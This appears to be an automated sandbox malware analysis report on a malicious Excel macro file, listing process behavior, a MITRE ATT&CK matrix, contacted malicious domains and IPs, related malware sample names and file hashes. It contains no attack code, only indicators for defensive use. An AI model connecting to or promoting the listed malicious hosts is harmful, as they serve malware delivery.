Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe | Window / User API: threadDelayed 1104
Source: C:\Windows\splwow64.exe | Last function: Thread delayed
Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting11 | DLL Side-Loading1 | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | Application Window Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | File and Directory Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting11 | LSA Secrets | System Information Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact

Behavior Graph


Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner
theottomandoner.com | 2% | Virustotal
senderoalcielo.com | 1% | Virustotal

URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Virustotal
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe
https://directory.services. | 0% | URL Reputation | safe
https://staging.cortana.ai | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
theottomandoner.com | 5.100.155.169 | true | false | - | unknown
senderoalcielo.com | 108.167.165.249 | true | false | - | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://login.microsoftonline.com/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://shell.suite.office.com:1443 | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://autodiscover-s.outlook.com/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://cdn.entity. | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://powerlift.acompli.net | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://cortana.ai | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://cloudfiles.onenote.com/upload.aspx | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://entitlement.diagnosticssdf.office.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://api.aadrm.com/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://api.microsoftstream.com/api/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://cr.office.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://portal.office.com/account/?ref=ClientMeControl | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://graph.ppe.windows.net | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://res.getmicrosoftkey.com/api/redemptionevents | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://officeci.azurewebsites.net/api/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://store.office.cn/addinstemplate | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://globaldisco.crm.dynamics.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://store.officeppe.com/addinstemplate | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://web.microsoftstream.com/video/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://graph.windows.net | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://dataservice.o365filtering.com/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://prod-global-autodetect.acompli.net/autodetect | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://ncus.contentsync. | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
http://weather.service.msn.com/data.aspx | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | - | high
https://apis.live.net/v5.0/ | FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | false | URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                  high
                                                                                  https://management.azure.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://incidents.diagnostics.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/iosFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmediaFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                              high
                                                                                              https://api.office.netFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                          high
                                                                                                          https://storage.live.com/clientlogs/uploadlocationFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                            high
                                                                                                            https://templatelogging.office.com/client/logFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                high
                                                                                                                https://webshell.suite.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus.pagecontentsync.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://api.cortana.aiFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://staging.cortana.aiFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                                                                                  high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
5.100.155.169 | theottomandoner.com | United Kingdom | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
108.167.165.249 | senderoalcielo.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 438634
Start date: 22.06.2021
Start time: 21:16:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 11s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: idea-22543577.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.evad.winXLSM@7/9@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 92.122.145.220, 104.43.193.48, 52.109.76.68, 52.109.88.37, 52.109.12.21, 13.88.21.125, 20.82.210.154, 20.54.104.15, 40.112.88.60, 93.184.221.240, 80.67.82.211, 80.67.82.235, 20.82.209.183
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

Time | Type | Description
21:17:14 | API Interceptor | 1143x Sleep call for process: splwow64.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
5.100.155.169 | http://y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074 | malicious | y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074
108.167.165.249 | idea-22543577.xlsm | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
senderoalcielo.com | idea-22543577.xlsm | malicious | 108.167.165.249

ASN

Match: UNIFIEDLAYER-AS-1 (US)
Associated Sample Name / URL | Detection | Context
idea-22543577.xlsm | malicious | 108.167.165.249
Fra8994.exe | malicious | 162.241.60.126
WXs8v9QuE7.exe | malicious | 50.87.146.99
tender-1235416393.xlsm | malicious | 192.185.88.195
tender-1235416393.xlsm | malicious | 192.185.88.195
Order.exe | malicious | 108.167.183.94
Habib_Bank Payment Advice.doc__.rtf | malicious | 162.144.79.7
heoN5wnP2d.exe | malicious | 74.220.199.8
FidKy67SWO.exe | malicious | 192.254.185.252
RFQ-BCM 03122020.exe | malicious | 50.87.249.240
plan-1637276620.xlsm | malicious | 192.185.21.116
idea-1232922316.xlsb | malicious | 162.241.194.107
Orden de compra.exe | malicious | 192.185.0.218
Drawing.exe | malicious | 162.241.61.229
aim-1028486377.xlsb | malicious | 192.232.222.161
VM_5823_05_24_2-2.html | malicious | 162.214.148.174
KTOpmUzBlp.xls | malicious | 162.241.87.244
KTOpmUzBlp.xls | malicious | 162.241.61.218
KTOpmUzBlp.xls | malicious | 162.241.87.244
eHTLcWfhgv.exe | malicious | 74.220.199.8

Match: PUBLIC-DOMAIN-REGISTRY (US)
Associated Sample Name / URL | Detection | Context
idea-22543577.xlsm | malicious | 5.100.155.169
Fra8995.exe | malicious | 208.91.198.143
Fra8996.exe | malicious | 208.91.198.143
Fra8997.exe | malicious | 208.91.199.223
plan-1637276620.xlsm | malicious | 103.50.160.62
aim-1028486377.xlsb | malicious | 103.21.59.25
7qVSiXSTdETO7cX.exe | malicious | 208.91.198.143
PI Invoice.exe | malicious | 208.91.198.143
Payment Advice Note from 21.06.2021 to 608720.exe | malicious | 208.91.199.225
Inquiry pdf.exe | malicious | 208.91.198.143
HYr6YeH1RP.exe | malicious | 208.91.198.143
fng1AXSgue.exe | malicious | 208.91.199.225
memorandum.exe | malicious | 208.91.199.223
Bank Betails.exe | malicious | 208.91.199.225
SecuriteInfo.com.Trojan.PackedNET.854.8381.exe | malicious | 208.91.199.233
AWB & Shipping Documents.exe | malicious | 208.91.199.224
order no ORD00404083_01.exe | malicious | 208.91.199.223
PO#4500484210.exe | malicious | 208.91.199.233
Request for Catalog and quotation.exe | malicious | 208.91.198.143
INQUIRY pdf.exe | malicious | 208.91.199.223

JA3 Fingerprints

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Context
OzygoxrbzzvtmyjupcpndcovpjxtqpiywjSigned.exe | malicious | 5.100.155.169, 108.167.165.249
2t71031BUz.exe | malicious | 5.100.155.169, 108.167.165.249
DmtxjmmsiwawliehhrzxcpwdxtexpegwgoSigned.exe | malicious | 5.100.155.169, 108.167.165.249
tender-1235416393.xlsm | malicious | 5.100.155.169, 108.167.165.249
Payment Ref 24,845.docx | malicious | 5.100.155.169, 108.167.165.249
3yBar59k6g.exe | malicious | 5.100.155.169, 108.167.165.249
rVkZUqVZ40.exe | malicious | 5.100.155.169, 108.167.165.249
idea-1232922316.xlsb | malicious | 5.100.155.169, 108.167.165.249
askinstall41.exe | malicious | 5.100.155.169, 108.167.165.249
askinstall41.exe | malicious | 5.100.155.169, 108.167.165.249
Potvrda o uplati u eurima.exe | malicious | 5.100.155.169, 108.167.165.249
6Lld5WIJBW.exe | malicious | 5.100.155.169, 108.167.165.249
pvWf7hYnWu.exe | malicious | 5.100.155.169, 108.167.165.249
TT_COPY.MT103.SWIFT.docx | malicious | 5.100.155.169, 108.167.165.249
MT103.docx | malicious | 5.100.155.169, 108.167.165.249
FAX.HTML | malicious | 5.100.155.169, 108.167.165.249
VM_5823_05_24_2-2.html | malicious | 5.100.155.169, 108.167.165.249
Outside Caller 06-18-21.HTML | malicious | 5.100.155.169, 108.167.165.249
KTOpmUzBlp.xls | malicious | 5.100.155.169, 108.167.165.249
MzhINp1fRi.exe | malicious | 5.100.155.169, 108.167.165.249

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FF586352-751C-4478-9E87-FF9CF397D4DE
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134914
Entropy (8bit): 5.367825535284073
Encrypted: false
SSDEEP: 1536:pcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:xEQ9DQW+zvXO1
MD5: 07158A29A2EEE64999158D2BE14B8807
SHA1: 65917A4FB5D0653E2419414FB22C5C0B7E1C9588
SHA-256: DF7E37BE4E59DE60F520C6FBF06319843BC5A6CF96A8FBFC74B51740117DB4A4
